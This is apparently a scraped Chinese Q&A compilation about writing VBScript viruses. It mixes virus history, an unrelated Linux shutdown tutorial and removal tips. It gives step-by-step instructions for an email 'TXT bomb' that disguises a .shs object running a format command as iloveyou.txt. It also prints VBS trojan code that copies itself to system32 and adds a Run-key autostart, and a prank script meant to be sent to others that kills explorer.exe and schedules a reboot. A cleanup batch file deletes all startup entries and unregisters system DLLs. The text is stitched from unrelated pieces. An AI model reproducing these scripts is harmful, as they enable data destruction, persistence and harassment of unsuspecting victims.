计算机病毒里面的题：使用VBS编写一个具有病毒基本特征的病毒，并自己编写一个针对该病毒的清除软件。求

这个。。。。。

vbs之前的一个经典病毒是暴风一号，后被变种成“假文件夹病毒”，你要的话追问并留邮箱，我把一些涉及修改注册表和系统文件的危险动作除掉再给你发过去。

如果你有vbs基础，可以自行编写解毒脚本，没基础的请提前说，我有时间再帮你做。

电脑病毒 *** ***

电脑病毒是一个程序，一段可执行码。就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时，它们就随同文件一起蔓延开来。

除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎仅仅表现在文字和图象上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。

可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和 *** 等作为媒介传播扩散,能“传染” 其他程序的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为制造的程序,它通过不同的途径潜伏或寄生在存储媒体（如磁盘、内存）或程序里。当某种条件或时机成熟时,它会自生复制并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒所相似之处是能够侵入计算机系统和 *** ,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复制, 具有传染性。

所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质（或程序）里, 当达到某种条件时即被激活的具有对计算机资源进行破坏作用的一组程序或指令 *** 。

1、最初"计算机病毒"这一概念的提出可追溯到七十年代美国作家雷恩出版的《P1的青春》一书，书中构思了一种能够自我复制，利用通信进行传播的计算机程序，并称之为计算机病毒。

2、贝尔实验室的三位年轻程序员也受到冯?诺依曼理论的启发，发明了“磁芯大战”游戏。

3、1983 年 11月，在一次国际计算机安全学术会议上，美国学者科恩之一次明确提出计算机病毒的概念，并进行了演示。

4、世界上公认的之一个在个人电脑上广泛流行的病毒是1986年初诞生的大脑(C-Brain)病毒，编写该病毒的是一对巴基斯坦兄弟，两兄弟经营着一家电脑公司，以出售自己编制的电脑软件为生。当时，由于当地盗版软件猖獗，为了防止软件被任意非法拷贝，也为了追踪到底有多少人在非法使用他们的软件，于是在1986年年初，他们编写了“大脑（Brain）”病毒，又被称为“巴基斯坦”病毒。该病毒运行在DOS操作系统下，通过软盘传播，只在盗拷软件时才发作，发作时将盗拷者的硬盘剩余空间吃掉。

5、1988年11月美国国防部的军用计算机 *** 遭受莫里斯病毒袭击，致使美国Internet *** 上6000多计算机感染，直接经济损失9600万美元。莫里斯病毒是由康乃尔大学23岁的罗特?莫里斯 *** 。后来出现的各类蠕虫，都是仿造了莫里斯蠕虫，以至于人们将该病毒的编制者莫里斯称为“蠕虫之父”。

6、1999年 Happy99、美丽杀手（Melissa）等完全通过Internet传播的病毒的出现标志着Internet病毒将成为病毒新的增长点。其特点就是利用Internet的优势，快速进行大规模的传播，从而使病毒在极短的时间内遍布全球。

7、CIH病毒是继DOS病毒的第四类新型病毒，CIH这三个字母曾经代表着灾难。1998年8月从台湾传入大陆，共有三个主要版本：1.2版/1.3版/1.4版，发作时间分别是4月26日、6月26日、每月26日。该病毒是之一个直接攻击、破坏硬件的计算机病毒，是迄今为止破坏最为严重的病毒。

CIH病毒制造者 陈盈豪 曾有两次精神科门诊记录，被人们认为是“电脑鬼才”。

8、2000年的5月，通过电子邮件传播的"爱虫"病毒迅速在世界各地蔓延，更大规模的发作，造成全世界空前的计算机系统破坏。 I LOVE YOU爱虫病毒是使用VB Script程序语言编写的病毒，它主要是通过一封信件标题为“I LOVE YOU"的电子邮件传播的。一旦执行附加文件，病毒会获取Outlook通讯录的名单，并自动发出“I LOVE YOU”电子邮件，从而导致 *** 阻塞。破坏性：爱虫病毒的传播会导致 *** 瘫痪，病毒发作时，还会把*.mp3、*.jpg等10种文件改为*.vbs，并传染覆盖这些文件。

与爱虫病毒相似的 *** 病毒还有Melissa（美丽杀手病毒）等。

麻烦你给我写一个简单的电脑病毒、我试着 *** 一下、把过程写详细些好吗？

[本站原创]"TXT"，即大家最熟悉的纯文本格式，它是一种最基本的文本文件保存格式。有体积小、兼容性好、无病毒等优点。实话说树大招风，黑客们却利用人们对TXT这份信任搞起了TXT"炸弹"。TXT炸弹其实是披着".txt"外皮的"碎片对象"(扩展名为SHS)的文件，它通过邮件附件的形式，悄悄的进入你的系统。善良的人们以为光临的是TXT文件，没有任何的考虑便双击运行。这时这只披着羊皮的"老狼"，却脱掉"羊皮"，露出原形，干起破坏计算机系统的勾当。为了保护自身的安全，摸清的"对方"的底细。今天我们向大家展示如何 *** 一个格式化软盘的TXT炸弹。我们的目的在于知已知彼，百战百胜。

实战"TXT"病毒

步骤1 打开记事本，创建一个只包含一个空格(为了减小文件体积)的文本文件，任意取名。

步骤2 打开写字板，将此文件拖放入记事本。也可以单击记事本菜单栏中的【插入】|【对象】，弹出【插入对象】对话框，选中【从文件创建】，然后单击【浏览】按钮选择要插入的文件（如图1）。

图1 插入对象

步骤3 选中该插入对象的图标，选择菜单栏中的【编辑】|【包对象】|【编辑包】(如图2)。

图2添加图标

在弹出的【对象包装程序】对话框中，选择菜单栏中的【编辑】|【命令行】，然后输入如下命令：Format.com a: /autotest，单击【确定】，此时，内容栏中会显示出命令内容（如图3）。

图3 添加命令

步骤4 单击外观栏中的【插入图标】按钮，会弹出一个警告对话框，确认，然后任选一个图标（如图4）。

图4 选取图标

步骤5 选择菜单栏中的【编辑】|【卷标】，为此嵌入对象取一个名称(会替换原来的文件名称)（如图5）。单击【文件】菜单中的【更新】，然后关闭此对话框。

图5 卷标

步骤6 将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是"碎片"，现在我们把它改成"iloveyou.txt"。打开电子邮件程序将桌面上的"iloveyou.txt"作为附件发出，或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。

步骤7 当邮件接收者误将"iloveyou.txt.shs"文件作为"iloveyou.txt"放心地打开时，或打开文件，单击文件中的嵌入对象时触发恶意命令(弹出DOS运行窗口，执行格式化命令)，假如此时有另一个程序正在访问软驱，则会显示如下信息"Drive A: is currently in use by another process. Aborting Format."(A驱正被另一个程序访问，格式化中止)。这样一个格式化软盘的炸弹就 *** 起来了，如果大家加上格式化硬盘的代码，那效果可以想象了。

防御

面对如此狡猾的TXT炸弹，平时就不拘小节的我们如何提防呢，下面向大家介绍两种防治措施，以防一方平安。

1．揭开TXT的外皮

其实TXT病毒最后的危害在于它的隐蔽性，如何我们能够揭开它的外皮，直接显示出".SHS"扩展名，这样危害就会减少很多。显示".SHS"扩展名 *** 其实很简单，只要找开注册表编辑器，从中找到"HEY_CLASSES_ROOTShellScrap"键，在其下面的一个键值为"NeverShowExt"，它是无法显示".SHS"文件扩展名的"罪魁祸首"，删除它，以后我们就可以直接看到".SHS"扩展名了，当然这时的人们绝不会在三心二意了。

2．更换"碎片对象"图标。

我们为什么一眼就可以看出某种文件的具体的格式，这都是由它们的默认图标决定的。因为于碎片对象文件的默认图标与文本文件图标非常相似所以我们经常将碎片对象文件误认为TXT文件。为了区别开它们，我们只要更换碎片对象文件的默认图标即可。打开"资源管理器"，然后选中【查看】菜单下的【文件夹选框】，在弹出的对话框中选择【文件类型】活页卡，在【已注册的文件类型】下找到【碎片对象】。单击右上角【编辑】按钮，在打开的【编辑文件类型】对话框中单击上边的【更改图标】按钮（如图6）。打开C:WINDOWSSYSTEMPifmgr.dll，从出现的图标中选一个作为.SHS文件的新图标(就选之一排最后一个吧，一颗炸弹！)，这样以后一看就知道这是一颗炸弹哟，大意不得。

图6 编辑类型

方便日常操作，常用的关机和重启命令

Linux中常用的关机和重新启动命令有shutdown、halt、reboot以及init，它们都可以达到关机和重新启动的目的，但是每个命令的内部工作过程是不同的，下面将逐一进行介绍。

1. shutdown

shutdown命令用于安全关闭Linux系统。有些用户会使用直接断掉电源的方式来关闭Linux，这是十分危险的。因为Linux与Windows不同，其后台运行着许多进程，所以强制关机可能会导致进程的数据丢失，使系统处于不稳定的状态，甚至会损坏硬件设备。

执行shutdown命令时，系统会通知所有登录的用户系统将要关闭，并且login指令会被冻结，即新的用户不能再登录系统。使用shutdown命令可以直接关闭系统，也可以延迟指定的时间再关闭系统，还可以重新启动。延迟指定的时间再关闭系统，可以让用户有时间储存当前正在处理的文件和关闭已经打开的程序。

shutdown命令的部分参数如下：

[-t] 指定在多长时间之后关闭系统

[-r] 重启系统

[-k] 并不真正关机，只是给每个登录用户发送警告信号

[-h] 关闭系统（halt）

shutdown命令的工作实质是给init程序发送信号（signal），要求其切换系统的运行级别（Runlevel）。系统的运行级别包括：

0：关闭系统

1：单用户模式，如果没有为shutdown命令指定-h或-r参数而直接执行，则默认将切换到此运行级别

2：多用户模式（不支持NFS）

3：多用户模式（支持NFS），一般常用此种运行级别

5：多用户模式（GUI模式）

6：重新启动系统

2. halt

halt是最简单的关机命令，其实际上是调用shutdown -h命令。halt执行时，杀死应用进程，文件系统写操作完成后就会停止内核。

halt命令的部分参数如下：

[-f] 没有调用shutdown而强制关机或重启

[-i] 关机或重新启动之前，关掉所有的 *** 接口

[-p] 关机时调用poweroff，此选项为缺省选项

3.reboot

reboot的工作过程与halt类似，其作用是重新启动，而halt是关机。其参数也与halt类似。

4.init

init是所有进程的祖先，其进程号始终为1。init用于切换系统的运行级别，切换的工作是立即完成的。init 0命令用于立即将系统运行级别切换为0，即关机；init 6命令用于将系统运行级别切换为6，即重新启动。

(T115)

怎么用VBScript做一个可以破坏系统的病毒？

这个很难，几乎不可能

1、VBScript只能运行在IE浏览器中，即使做成VBS可独立运行的文件，也无法完全脱离IE浏览器；

2、VBScript是脚本程序，除了要受IE浏览器的安全机制约束，还要受其他很多限制，如果电脑系统中存在阶级，那么VBScript就是更底层的贫民，是 *** 丝中的 *** 丝；

3、360这类的安全软件对VBScript这类脚本程序一向严查、毫不手软的；

4、即使以上这些都不算事，一个软件要想破坏系统也绝非易事，也不知你说的破坏系统究竟是指破坏硬件系统还是软件系统，前者是不可能的，后者在几乎每台电脑都装了360或电脑管家的今天也几乎是不可能的；

5、即使以上这些都能做到，你还要求简单一些，那就只有上帝知道了，前提是上帝也懂编程。

vbs病毒。被这种病毒搞疯了，救命

呵呵，小小的脚本病毒都搞不定，简单的很。

写个批处理辅助你杀毒，把一下文本保存为 bat 文件，运行之后，就可以找个杀毒辅助清除残留了

::=========批处理开始==============

@echo off

::关闭进程

taskkill /f /im wscript.exe

taskkill /f /im cscript.exe

::注销组件

regsvr32 /u %windir%\system32\wshom.ocx

regsvr32 /u %windir%\system32\shell32.dll

regsvr32 /u %windir%\system32\scrrun.dll

:: 关闭u盘自动运行

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f

:: 清除自启动项

reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f

自制简单电脑病毒破解

1.建立一个txt文件，写入"shutdown -a"(引号不算)，改名为bat，运行后可以直接取消关机指令。

2.如果你速度够快，按WIN+R然后输入shutdown -a 也可以

如何使用VBS撰写一个木马

这个嘛，前面二个比较简单

set fso=createobject(scripting.filesystemobject)

set dir=fso.getspecialfolder(1)‘获得Windows\system32系统文件夹

fso.getfile(wscript.scriptfullname).copy(dir"\vbs.vbs")‘将自己复制到系统文件夹，并命名为vbs

set wshshell=createobject(wscript.shell)

wshshell.regwrite"HKLM\software\microsoft\windows\currentversion\run\vbs",dir"\vbs.vbs","vbs.vbs"'加入启动项

谁知道怎么用vbs写不能开机的病毒，给个代码。就是一开就关机的病毒。好了我给分

新建一个TXT文件，打开，把整人代码放进去，保存。然后把文件扩展名改成.VBS，发送给别人，运行，就能整人了。

比如：

gsh=msgbox ("已经准备好格式化，准备开始。",vbyesno)

set s=createobject("wscript.shell")

wscript.sleep 1000

msgbox "开始格式化…… 哈哈！吓晕了吧，骗你的~"

wscript.sleep 1000

wscript.sleep 1000*100

msgbox "windows发现一重要更新，将自动下载。"

wscript.sleep 3000

msgbox "系统检测到WINDOWS更新中捆绑有不明插件SXS.exe,是否对其扫描？",vbyesno

wscript.sleep 1000

msgbox "文件名 SXS.exe"+CHR(13)+"发行者 田间的菜鸟 "+chr(13)+"安全评级 高危"+chr(13)+"建议 直接删除"+chr(13)+"病毒类型：木马",,"windows扫描附件"

msgbox "是否阻止其安装？",vbyesno

wscript.sleep 3000

msgbox "阻止失败！请检查防火墙是否开启！"

wscript.sleep 5000

msgbox "正在尝试强行删除…"

wscript.sleep 5000

msgbox "失败！"

wscript.sleep 5000

msgbox "您的电脑已陷入危险之中，请赶快扫描病毒！"

wscript.sleep 10000

s.sendkeys "% n"

s.run "taskkill /im .exe"

s.sendkeys "% n"

s.run "taskkill /im explorer.exe /f"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

s.sendkeys "% n"

msgbox "你好啊！"

wscript.sleep 3000

msgbox "很高兴见到你！"

wscript.sleep 3000

msgbox "您的电脑可能已经感染病毒！",,"WINDOWS防火墙警告"

wscript.sleep 3000

msgbox "我控制你的电脑了！"

wscript.sleep 3000

msgbox "不信？那我给你关机看看~"

s.run "shutdown -r -t 120"

msgbox "信了吧！"

msgbox "帮你解除关机……"

s.run "shutdown -a"

msgbox "再给你打开记事本写封信，劝你更好别动，要不然会引起系统混乱~"

s.run "notepad"

wscript.sleep 3000

s.sendkeys "Hello, I'm sorry I control your computer,"

wscript.sleep 3000

s.sendkeys " but the virus is false in, "

wscript.sleep 3000

s.sendkeys "only a joke, "

wscript.sleep 3000

s.sendkeys "please rest assured! "

wscript.sleep 3000

s.sendkeys "I no longer next "

wscript.sleep 3000

s.sendkeys "time so the whole you!"

wscript.sleep 3000

s.sendkeys" Goodbye!"

s.sendkeys"{enter}"

s.sendkeys"END"

wscript.sleep 1000

s.sendkeys"%{F4}"

msgbox "提示：刚才的“病毒”是假的，只不过是吓你玩玩~"

s.run "explorer"

这个整人程序，既不会关机，也不会对电脑有伤害，就是有点烦。

VBScript(Microsoft Visual Basic Script Editon).，微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言。进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是写的程序不需要编译成.exe,，而是直接给用户发送.vbs的源程序, 用户就能执行了。